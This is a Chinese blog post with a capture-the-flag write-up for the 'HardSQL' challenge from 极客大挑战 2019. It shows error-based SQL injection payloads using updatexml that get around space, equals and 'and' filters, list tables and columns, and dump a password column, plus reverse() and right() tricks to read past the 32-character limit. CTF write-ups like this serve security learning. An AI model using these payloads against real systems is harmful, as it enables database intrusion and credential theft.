User-Profile-Image
hankin
  • 5
请到[后台->外观->菜单]中设置菜单。
  • 分类
    • 靶机渗透
    • 计算机小技巧
    • 未分类
    • 数据结构
    • 内网渗透
    • 代码审计
    • XSS
    • WEB安全漏洞学习
    • Web
    • python
    • PHP
    • NodeJS
    • MYSQL
    • Misc
    • JavaScript
    • Docker
    • CTF相关知识点
    • CTFWP
    • Crypto
    • Cobalt Strike
  • 页面
  • 友链
    • 三哥的博客
    • Root师傅的博客
    • EDS师傅的博客
    • 天正哥的博客
    • 天尘翼师傅的博客
    • 熵增师傅的github
    • 信仰的博客
    • Jadore的博客
Help?

Please contact us on our email for need any support

Support
    首页   ›   CTFWP   ›   正文
CTFWP

[极客大挑战 2019]HardSQL

2020-03-22 12:02:03
56  0 0

考点:SQL注入, 用括号做分隔代替空格 , like代替等号,用异或运算或or代替and

登录框抓包,对username和pasword的值加单引号进行测试, 在password处加单引号报错,说明存在报错注入

再首先进行Fuzz测试,这一步尤为关键,因为现在各类大型比赛必定过滤一大堆关键字,所以利用BP进行Fuzz测试如下,自备关键字字典

可以自行根据长度的返回包判断是否被过滤,这里是736

看到过滤了空格,/**/,+,=,and等

但可以用括号绕过空格过滤

查表

1’or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23

查字段

1’or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23

查内容

1’or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))%23

flag{e3b03a62-e477-4f4c-95aa-37

但是updatexml只能读取32个字符,buu上flag较长,同时substr和mid函数也被过滤,我们可以用right和reverse进行读取

1.reverse

1’or(updatexml(1,concat(0x7e,(select(reverse(password))from(H4rDsq1)),0x7e),1))%23

得到下面的值:从后读取32位

}a6eb9908e473-aa59-c4f4-774e-26

利用python转换

2.right

1%27or(updatexml(1,concat(0x7e,(select(right(password,32))from(H4rDsq1)),0x7e),1))%23

最后拼接得到flag

评论 (0)

点击这里取消回复。

欢迎您 游客  

近期文章
  • SUCTF 2019 Guess_game
  • Python pickle反序列化
  • [安洵杯 2019]easy_serialize_php
  • Session反序列化
  • 原生类序列化
近期评论
    文章归档
    • 2021年1月
    • 2020年12月
    • 2020年11月
    • 2020年9月
    • 2020年7月
    • 2020年6月
    • 2020年5月
    • 2020年4月
    • 2020年3月
    • 2020年2月
    • 2020年1月
    分类目录
    • Cobalt Strike
    • Crypto
    • CTFWP
    • CTF相关知识点
    • Docker
    • JavaScript
    • Misc
    • MYSQL
    • NodeJS
    • PHP
    • python
    • Web
    • WEB安全漏洞学习
    • XSS
    • 代码审计
    • 内网渗透
    • 数据结构
    • 未分类
    • 计算机小技巧
    • 靶机渗透
    功能
    • 登录
    • 项目feed
    • 评论feed
    • WordPress.org
    分类目录
    Copyright © 2021 网站备案号: 蒙ICP备20000552号-1
    smarty_hankin 主题. Designed by hankin
    主页
    页面
    博主
    purplet 管理员
    努力并有所方向
    157 文章 0 评论 21263 浏览
    测试
    测试